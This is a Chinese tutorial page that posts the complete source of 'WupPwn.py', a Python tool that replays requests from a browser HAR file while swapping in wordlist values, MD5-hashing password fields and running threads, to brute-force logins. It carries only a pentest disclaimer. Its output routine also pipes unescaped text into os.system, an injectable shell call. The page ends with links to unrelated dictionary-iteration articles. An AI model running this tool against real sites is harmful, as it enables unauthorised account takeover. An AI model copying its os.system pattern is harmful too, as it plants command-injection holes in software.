Python如何利用Har文件进行遍历指定字典替换提交的数据详解
利用Chrome或Firefox保存的Har文件http/https请求,可用于遍历字典提交From表单.
少说废话直接上代码
Github地址:https://github.com/H0xMrLin/wuppwn
#encoding:utf-8
import sys;
#Yeah,我没有注释。懒得写
HelpContent="""
Help:
+=====================================================================================================================+
WupPwn.py
Python3 WupPwn.py HarFileName [pd=filedName:Value|pd=filedName:$DicFileName] [if=responseContent] [ifnot=responseContent] [ifend=responseContent] [out=OutFileName]
HarFileName har文件名 谷歌或Firefox web抓包保存为har entries下可以看到所有请求的地址及参数 可以删除一些不必要的请求让程序更快运行
pd 设置上传数据 字段名:值 或者 字段名:字典
if=xxx 如果内容是xxx那就记录 可多个用||隔开
ifnot=xxx 如果内容不是xxx哪就记录 可多个用||隔开
ifend=xxx 如果内容是xxx那就记录并结束 可多个用||隔开
out=xx.txt 输出记录到文件
see=on|off 查看每次尝试破解响应
Current request method have: GET/POST
*且目前不支持http请求头带 RFC 标识 (RFC-eg: ':method':'POST')可以检查是否有
md5=XXX 将 指定字段名的值进行md5加密再暴力破解 一般=password||passwd||pwd ...
th=5 设置5个线程同时运行
版本警告:
《!》: 切勿用作违法使用,仅供渗透测试,如非法使用该工具与作者无关。 Makerby:Pwn0_+x_X
+=====================================================================================================================+
""";
if(len(sys.argv) <=1):
print(HelpContent);
sys.exit(1);
if(sys.argv[1].lower()=="h" or sys.argv[1].lower()=="-h" or sys.argv[1].lower()=="help"or sys.argv[1].lower()=="-help"):
print(HelpContent);
sys.exit(1);
import os;
import json;
import urllib.request;
import requests;
import socket;
import hashlib;
import threading;
import traceback;
import uuid;
import copy
from hyper.contrib import HTTP20Adapter;
socket.setdefaulttimeout(3);
CAllowRequestMethod=["get","post"];
HARFile=sys.argv[1];
harfp=open(HARFile,"rb");
harContent=harfp.read();
HarJSON=json.loads(harContent);
Body=HarJSON["log"]
print("Version :"+Body["version"]);
print("Request Count :"+str( len(Body["entries"])))
AimUrlAPar={};
for reqBody in Body["entries"]:
AimUrlAPar[reqBody["request"]["url"]]={};
AllowRequest="×";
if(reqBody["request"]["method"].lower() in CAllowRequestMethod):
AllowRequest="√";
else:
print(" "*5,"[",AllowRequest,"]",reqBody["request"]["method"],"\t\t"+reqBody["request"]["url"].split("?")[0])
continue;
print(" "*5,"[",AllowRequest,"]",reqBody["request"]["method"],"\t\t"+reqBody["request"]["url"].split("?")[0])
Parameter= reqBody["request"]["queryString"] if reqBody["request"]["method"].lower()=="get" else reqBody["request"]["postData"]["text"]
#print(Parameter)
if(reqBody["request"]["method"].lower()=="post"):
if "application/json" in reqBody["request"]["postData"]["mimeType"]:
Parameter=json.loads(Parameter)
else:
Parameter=reqBody["request"]["postData"]["params"];
tmpPar={};
for item in Parameter:
tmpPar[item["name"]]=item["value"];
Parameter=tmpPar;
AimUrlAPar[reqBody["request"]["url"]]["paramtertype"]=reqBody["request"]["postData"]["mimeType"].lower()
elif(reqBody["request"]["method"].lower()=="get"):
Par={};
#print("get")
for item in Parameter:
Par[item["name"]]=item["value"]
Parameter=Par;
headers={};
headNotContains=["Content-Length"];
for headFiled in reqBody["request"]["headers"]:
if headFiled["name"] in headNotContains:
continue;
headers[headFiled["name"]]=headFiled["value"];
cookies={};
for headFiled in reqBody["request"]["cookies"]:
cookies[headFiled["name"]]=headFiled["value"];
#print(cookies);
AimUrlAPar[reqBody["request"]["url"]]["arguments"]=Parameter
AimUrlAPar[reqBody["request"]["url"]]["header"]=headers
AimUrlAPar[reqBody["request"]["url"]]["cookies"]=cookies
AimUrlAPar[reqBody["request"]["url"]]["method"]=reqBody["request"]["method"].lower()
AimUrlAPar[reqBody["request"]["url"]]["httpversion"]=reqBody["request"]["httpVersion"].lower()
#系统存储
kPMd5={};
#用户参数设定
pds=[];
ifC=[];# 最小优先级
ifN=[];# 其二优先级
ifE=[];# 最大优先级
otFile="";
ascMD5=[];
testsee="off";
see="off";
th=0;
#因为我不太喜欢指令的参数化模块 所以我直接写了个硬代码 注:python的模块有时候很讨厌.
def setBaseParamters(Key,Value):
global see,otFile,testsee,th;
Key=Key.lower();
if(Key=="pd"):
FILEDSUM=Value.split(":");
filedName=FILEDSUM[0];
filedValue=FILEDSUM[1];
if(filedValue[0]=="$"):
apArr=[];
filedP=open(filedValue[1:],"r");
redValueLines=filedP.readlines();
for val in redValueLines:
apArr.append({filedName:val.replace("\n","")});
pds.append(apArr);
else:
pds.append([{filedName:filedValue}]);
elif(Key=="if"):
ifcItems=Value.split("||");
for item in ifcItems:
ifC.append(item);
elif(Key=="ifnot"):
ifcItems=Value.split("||");
for item in ifcItems:
ifN.append(item);
elif(Key=="ifend"):
ifcItems=Value.split("||");
for item in ifcItems:
ifE.append(item);
elif(Key=="md5"):
md5Items=Value.split("||");
for item in md5Items:
ascMD5.append(item);
elif(Key=="see"):
see=Value.strip().lower();
elif(Key=="out"):
otFile=Value.strip().lower();
elif(Key=="testsee"):
testsee=Value.strip().lower();
elif(Key=="th"):
th=int(Value.strip().lower());
return;
curThs={};
def pdLoop(index,havePar={},myThead=None):
global curThs,kPMd5;
for item in pds[index]:
FiledName=list(item.keys())[0];
FiledValue=list(item.values())[0];
if(FiledName in ascMD5):
m5Obj=hashlib.md5(bytes(FiledValue,encoding="UTF-8"));
SourceValue=FiledValue;
FiledValue=m5Obj.hexdigest();
kPMd5[FiledValue]=SourceValue;
havePar[FiledName]=FiledValue;
if(index>0):
if(th>0 and len(curThs)<th ):
print("[+]线程记录点")
childThread=str(uuid.uuid1()).replace("-","");
RunTh= threading.Thread(target=pdLoop,args=(index-1,copy.deepcopy(havePar),childThread,));
curThs[childThread]=RunTh;
RunTh.start();
else:
pdLoop(index-1,copy.deepcopy(havePar));
else:
Call(havePar);
if(myThead!=None):
print("[+]线程释放点",myThead)
curThs.pop(myThead);
def Call(sendData):
for reqUrl in list(AimUrlAPar.keys()):
CurHeaders= AimUrlAPar[reqUrl]["header"];
CurHeaders["Cookie"]="";
CurCookies= AimUrlAPar[reqUrl]["cookies"];
for cookieKey in list(CurCookies.keys()):
CurHeaders["Cookie"]+=cookieKey+"="+CurCookies[cookieKey]+";"
#print(cookieKey+"="+CurCookies[cookieKey]+";");
CurArguments= AimUrlAPar[reqUrl]["arguments"];
for cgDataKey in list(sendData.keys()):
CurArguments[cgDataKey]=sendData[cgDataKey];
try:
if(AimUrlAPar[reqUrl]["method"]=="get"):
print("[+]GET-Pwn:%s"%(reqUrl));
#data = urllib.parse.urlencode(CurArguments).encode('utf-8');
if(AimUrlAPar[reqUrl]["httpversion"]=="http/2.0"):
sessions.mount(reqUrl,HTTP20Adapter());
res=requests.get(reqUrl,headers=CurHeaders,params=CurArguments);
print(res.text);
Auth(CurArguments,res.text);
elif(AimUrlAPar[reqUrl]["method"]=="post"):
"""
data = urllib.parse.urlencode(CurArguments).encode('utf-8')
request = urllib.request.Request(reqUrl,data = data,headers = CurHeaders,method="POST");
response = urllib.request.urlopen(request)
html = response.read().decode('utf-8')"""
if(AimUrlAPar[reqUrl]["paramtertype"]=="application/x-www-form-urlencoded"):
data = urllib.parse.urlencode(CurArguments).encode('utf-8')
else:
data = json.dumps(CurArguments);
sessions=requests.session();
if(AimUrlAPar[reqUrl]["httpversion"]=="http/2.0"):
sessions.mount(reqUrl,HTTP20Adapter());
res=sessions.post(reqUrl,data=data,headers=CurHeaders);
Auth(CurArguments,res.text);
None;
except Exception as e:
print("[-]Pwn timeout",traceback.print_exc(),kPMd5)
def Auth(Arguments,resContent):
Success=False;
Arguments=copy.deepcopy(Arguments)
for argItemName in list(Arguments.keys()):
if(argItemName in ascMD5):
Arguments[argItemName]=kPMd5[Arguments[argItemName]];
#print(ifE,ifC,ifN)
for ifeItem in ifE:
if(ifeItem in resContent):
Output(str(Arguments));
sys.exit(1);
for ifnItem in ifN:
if not(ifnItem in resContent ):
Output(str(Arguments));
Success=True
for ifcItem in ifC:
if (ifcItem in resContent ):
Output(str(Arguments));
Success=True
if(see=='on'):
print({True:"\t[√]",False:"[-]"}[Success],Success,Arguments);
if(testsee=="on"):
print(resContent);
def Output(text):
if(otFile.strip() == ""):
return;
os.system("echo %s>>%s"%(text,otFile));
return ;
for index in range(len(sys.argv)-2):
parIndex=index+2;
parItem= sys.argv[parIndex];
try:
Item= parItem.split("=");
key=Item[0];
value=Item[1];
setBaseParamters(key,value);
except:
print("Error paramter(%s)"%(parItem));
#print(AimUrlAPar);
if(len(pds)-1>=0):
pdLoop(len(pds)-1)
总结
到此这篇关于Python如何利用Har文件进行遍历指定字典替换提交的数据的文章就介绍到这了,更多相关Python用Har文件遍历指定字典替换提交的数据内容请搜索我们以前的文章或继续浏览下面的相关文章希望大家以后多多支持我们!
相关推荐
-
Python3实现的字典遍历操作详解
本文实例讲述了Python3字典遍历操作.分享给大家供大家参考,具体如下: 字典是针对非序列集合而提供的一种数据类型. 通过任意键查找集合中值信息的过程叫映射,python通过字典实现映射. 为字典赋值: >>> d={'list':[1, 2, 3],1:123,'111':'python3','tuple':(4, 5, 6)} >>> print(d) {1: 123, 'list': [1, 2, 3], '111': 'python3', 'tuple': (
-
Python多维/嵌套字典数据无限遍历的实现
最近拾回Django学习,实例练习中遇到了对多维字典类型数据的遍历操作问题,Google查询没有相关资料-毕竟是新手,到自己动手时发现并非想象中简单,颇有两次曲折才最终实现效果,将过程记录下来希望对大家有用. 实例数据(多重嵌套): person = {"male":{"name":"Shawn"}, "female":{"name":"Betty","age":23
-
python字典键值对的添加和遍历方法
添加键值对 首先定义一个空字典 >>> dic={} 直接对字典中不存在的key进行赋值来添加 >>> dic['name']='zhangsan' >>> dic {'name': 'zhangsan'} 如果key或value都是变量也可以用这种方法 >>> key='age' >>> value=30 >>> dic[key]=value >>> dic {'age': 30
-
python两种遍历字典(dict)的方法比较
python以其优美的语法和方便的内置数据结构,赢得了不少程序员的亲睐.其中有个很有用的数据结构,就是字典(dict),使用非常简单.说到遍历一个dict结构,我想大多数人都会想到 for key in dictobj 的方法,确实这个方法在大多数情况下都是适用的.但是并不是完全安全,请看下面这个例子: 复制代码 代码如下: #这里初始化一个dict>>> d = {'a':1, 'b':0, 'c':1, 'd':0}#本意是遍历dict,发现元素的值是0的话,就删掉>>&
-
python 字典(dict)遍历的四种方法性能测试报告
python中,遍历dict的方法有四种.但这四种遍历的性能如何呢?我做了如下的测试 l = [(x,x) for x in xrange(10000)] d = dict(l) from time import clock t0=clock() for i in d: t = i + d[i] t1=clock() for k,v in d.items(): t = k + v t2=clock() for k,v in d.iteritems(): t = k + v t3=clock()
-
Python中使用item()方法遍历字典的例子
Python字典的遍历方法有好几种,其中一种是for...in,这个我就不说明,在Python了几乎随处都可见for...in.下面说的这种遍历方式是item()方法. item() item()方法把字典中每对key和value组成一个元组,并把这些元组放在列表中返回. DEMO 代码: 复制代码 代码如下: person={'name':'lizhong','age':'26','city':'BeiJing','blog':'www.jb51.net'} for key,value i
-
Python中字典创建、遍历、添加等实用操作技巧合集
字段是Python是字典中唯一的键-值类型,是Python中非常重要的数据结构,因其用哈希的方式存储数据,其复杂度为O(1),速度非常快.下面列出字典的常用的用途. 一.字典中常见方法列表 复制代码 代码如下: #方法 #描述 ------------------------------------------------------------------------------------------------- D.c
-
Python简单遍历字典及删除元素的方法
本文实例讲述了Python简单遍历字典及删除元素的方法.分享给大家供大家参考,具体如下: 这种方式是一定有问题的: d = {'a':1, 'b':2, 'c':3} for key in d: d.pop(key) 会报这个错误:RuntimeError: dictionary changed size during iteration 这种方式Python2可行,Python3还是报上面这个错误. d = {'a':1, 'b':2, 'c':3} for key in d.keys():
-
python字典的遍历3种方法详解
遍历字典: keys() .values() .items() 1. xxx.keys() : 返回字典的所有的key 返回一个序列,序列中保存有字典的所有的键 效果图: 代码: # keys() 该方法会返回字典的所有的key # 该方法会返回一个序列,序列中保存有字典的所有的键 d = {'name':'孙悟空','age':18,'gender':'男'} print(d.keys()) print() # 通过遍历keys()来获取所有的键 for k in d.keys() : pri
-
Python中遍历字典过程中更改元素导致异常的解决方法
先来回顾一下Python中遍历字典的一些基本方法: 脚本: #!/usr/bin/python dict={"a":"apple","b":"banana","o":"orange"} print "##########dict######################" for i in dict: print "dict[%s]=" % i,